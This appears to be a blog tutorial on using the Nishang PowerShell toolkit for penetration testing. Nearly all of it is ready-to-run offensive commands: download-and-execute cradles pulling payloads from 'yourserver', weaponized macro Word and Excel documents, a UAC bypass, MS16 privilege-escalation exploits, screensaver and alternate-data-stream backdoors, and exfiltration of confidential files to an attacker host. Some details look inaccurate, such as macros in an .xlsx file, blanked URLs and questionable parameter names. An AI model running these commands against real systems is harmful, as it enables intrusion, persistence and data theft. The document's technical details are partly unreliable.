Greetings, fellow hackers and security enthusiasts! Today, we’re diving deep into the world of PowerShell and penetration testing with a focus on Nishang. As you all know, PowerShell has become an invaluable tool for ethical hackers and red teams, thanks to its power, flexibility, and the ability to execute code on Windows systems without any additional dependencies.

Nishang is a fantastic collection of PowerShell scripts that helps pen testers and red teams perform various tasks, from reconnaissance and gaining initial access to privilege escalation and maintaining persistence. In this article, we’ll explore Nishang in detail, covering various modules, how to use them, and real-world examples that will surely pique your interest.

Without further ado, let’s get started!

Understanding Nishang

Nishang is an open-source project created by Nikhil Mittal, a well-known security researcher and penetration tester. It is a collection of PowerShell scripts designed for penetration testing and red teaming exercises, focusing on ease of use, stealth, and post-exploitation capabilities. Nishang boasts an extensive range of modules, including reconnaissance, initial access, lateral movement, privilege escalation, persistence, and exfiltration.

The beauty of Nishang lies in its ability to blend seamlessly into the Windows environment, making it less suspicious and less likely to trigger security alerts. This stealthy approach, coupled with its wide array of features, makes Nishang a favorite among penetration testers and red teams.

Setting Up Nishang

Before diving into the exciting world of Nishang, we need to set it up. To download Nishang, simply clone the GitHub repository using the following command:

git clone

Once the repository has been cloned, navigate to the nishang directory, and you’re good to go. Remember to run PowerShell with administrative privileges to ensure smooth execution of Nishang scripts.


Reconnaissance is the first phase of any successful penetration testing or red teaming exercise. In this section, we’ll cover some of Nishang’s reconnaissance scripts.


The Get-Information script is a useful starting point as it gathers various system details, such as OS version, installed software, running processes, local users, and more. This information can help you identify potential vulnerabilities and plan your attack.

To use Get-Information, execute the following command:

Import-Module .\Get-Information.ps1


When targeting web applications, it’s helpful to identify the title of each webpage to gain a better understanding of the target site’s structure. Get-WebTitle is a simple Nishang script that allows you to fetch webpage titles in bulk.

To use Get-WebTitle, execute the following command:

Import-Module .\Get-WebTitle.ps1
Get-WebTitle -URLs "", ""


DNS_TXT_Pwnage is a creative script that uses DNS TXT records for data exfiltration and command execution. This technique is stealthy, as it does not involve direct communication between the attacker and the target system.

To use DNS_TXT_Pwnage, you must first set up a DNS server to control your target. Here’s an example of how to use DNS_TXT_Pwnage for command execution:

Import-Module .\DNS_TXT_Pwnage.ps1
Invoke-DNS_TXT_Pwnage -Domain "" -Type CMD

Initial Access

Gaining initial access to the target system is crucial in penetration testing and red teaming exercises. Nishang offers various techniques to achieve this goal.


The HTTP-Backdoor script is a powerful initial access tool that uses HTTP requests to execute commands on the target system. The script listens for incoming HTTP requests, interprets the commands, and executes them on the target system.

To use HTTP-Backdoor, follow these steps:

  1. Set up a web server to host the HTTP-Backdoor.ps1 script. Make sure the server is accessible by the target system.
  2. On the target system, execute the following command:
    IEX (New-Object Net.WebClient).DownloadString('http://yourserver/HTTP-Backdoor.ps1')
  3. From your attacking machine, send HTTP requests containing commands to the target system:
    curl http://targetIP/?cmd=whoami


Out-Word is a useful script for creating weaponized Word documents containing PowerShell payloads. When the target user opens the Word document and enables macros, the payload is executed, providing initial access to the target system.

To use Out-Word, execute the following command:

Import-Module .\Out-Word.ps1
Out-Word -Payload "IEX (New-Object Net.WebClient).DownloadString('http://yourserver/payload.ps1')" -OutFile "malicious.doc"


Similar to Out-Word, Out-Excel creates weaponized Excel documents with embedded PowerShell payloads. The process is nearly identical to that of Out-Word.

To use Out-Excel, execute the following command:

Import-Module .\Out-Excel.ps1
Out-Excel -Payload "IEX (New-Object Net.WebClient).DownloadString('http://yourserver/payload.ps1')" -OutFile "malicious.xlsx"

Lateral Movement

Once you’ve gained initial access, lateral movement becomes crucial for expanding your foothold in the target environment. Nishang provides several scripts for this purpose.


Invoke-PsUACme is a script that bypasses the User Account Control (UAC) mechanism on the target system, allowing you to execute commands with higher privileges.

To use Invoke-PsUACme, execute the following command:

Import-Module .\Invoke-PsUACme.ps1
Invoke-PsUACme -Payload "IEX (New-Object Net.WebClient).DownloadString('http://yourserver/payload.ps1')"


Invoke-SSHCommand is a versatile script that enables you to execute commands on remote systems over SSH. This is particularly useful for lateral movement in a mixed environment with both Windows and Linux systems.

To use Invoke-SSHCommand, execute the following command:

Import-Module .\Invoke-SSHCommand.ps1
Invoke-SSHCommand -HostName "targetIP" -UserName "username" -Password "password" -Command "whoami"

Privilege Escalation

Privilege escalation is a critical step in gaining full control of the target system. Nishang offers various scripts for this purpose, some of which exploit known vulnerabilities.


Invoke-MS16-032 is a script that exploits the MS16-032 vulnerability, a Windows Secondary Logon Service privilege escalation flaw. Successful exploitation grants SYSTEM privileges on vulnerable systems.

To use Invoke-MS16-032, execute the following command:

Import-Module .\Invoke-MS16-032.ps1


Invoke-MS16-014 is another privilege escalation script, targeting the MS16-014 vulnerability, a Windows CSRSS Local Privilege Escalation flaw. Like Invoke-MS16-032, this script provides SYSTEM privileges on vulnerable systems.

To use Invoke-MS16-014, execute the following command:

Import-Module .\Invoke-MS16-014.ps1


Maintaining access to the target system is crucial for long-term success in penetration testing and red teaming exercises. Nishang provides several techniques for achieving persistence.


Add-ScrnSaveBackdoor is a stealthy persistence script that sets a PowerShell payload as the screensaver on the target system. When the screensaver is triggered, the payload is executed.

To use Add-ScrnSaveBackdoor, execute the following command:

Import-Module .\Add-ScrnSaveBackdoor.ps1
Add-ScrnSaveBackdoor -Payload "IEX (New-Object Net.WebClient).DownloadString('http://yourserver/payload.ps1')"


Invoke-ADSBackdoor is another stealthy persistence technique that leverages Alternate Data Streams (ADS) to hide PowerShell payloads within existing files on the target system. The payload is then executed via a scheduled task.

To use Invoke-ADSBackdoor, execute the following command:

Import-Module .\Invoke-ADSBackdoor.ps1
Invoke-ADSBackdoor -Payload "IEX (New-Object Net.WebClient).DownloadString('http://yourserver/payload.ps1')" -TargetFile "C:\Windows\System32\calc.exe"


Extracting data from the target system is often the ultimate goal of penetration testing and red teaming exercises. Nishang provides several tools for data exfiltration.


Do-Exfiltration is a flexible script that supports multiple exfiltration techniques, including HTTP, HTTPS, FTP, and DNS.

To use Do-Exfiltration, execute the following command:

Import-Module .\Do-Exfiltration.ps1
Do-Exfiltration -File "C:\Users\username\Documents\confidential.docx" -Type HTTP -URL "http://yourserver/exfil"


Invoke-FileTransfer is a script that supports file transfers between the target system and the attacker’s machine, using either HTTP or BITSAdmin.

To use Invoke-FileTransfer, execute the following command:

Import-Module .\Invoke-FileTransfer.ps1
Invoke-FileTransfer -Source "C:\Users\username\Documents\confidential.docx" -Destination "http://yourserver/exfil" -Method HTTP


In this article, we’ve explored Nishang, an invaluable collection of PowerShell scripts designed to assist penetration testers and red teams in their missions. With its wide range of modules and stealthy approach, Nishang has become a go-to tool for many security professionals.

As ethical hackers, it’s essential to stay up-to-date with the latest tools and techniques to ensure we can effectively assess and secure our environments. Nishang is a prime example of the power and flexibility of PowerShell and a testament to the value of open-source projects in the cybersecurity community.

As always, remember to use these tools responsibly and within the boundaries of the law. Happy hacking!